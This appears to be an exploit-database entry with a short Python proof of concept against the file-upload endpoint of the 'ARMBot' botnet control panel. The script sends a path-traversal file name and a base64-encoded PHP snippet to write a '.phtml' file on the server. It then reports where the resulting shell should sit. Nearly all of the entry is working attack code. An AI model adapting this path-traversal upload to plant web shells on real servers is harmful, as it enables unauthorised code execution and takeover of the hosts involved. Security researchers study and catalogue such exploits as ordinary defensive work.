ARMBot Botnet - Arbitrary Code Execution
Author: prsecurity
type: remote
platform: multiple
port:
date_added: 2019-08-05
date_updated: 2019-08-05
verified: 0
codes:
tags: Malware
aliases:
screenshot_url:
application_url:
import requests
URL = "http://127.0.0.1/ARMBot/upload.php"
r = requests.post(URL,
data = {
"file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
"data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
"message":"Bobr Dobr"
}, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
print(r.status_code)
print("shell should be at http://{}/.s.phtml".format(URL))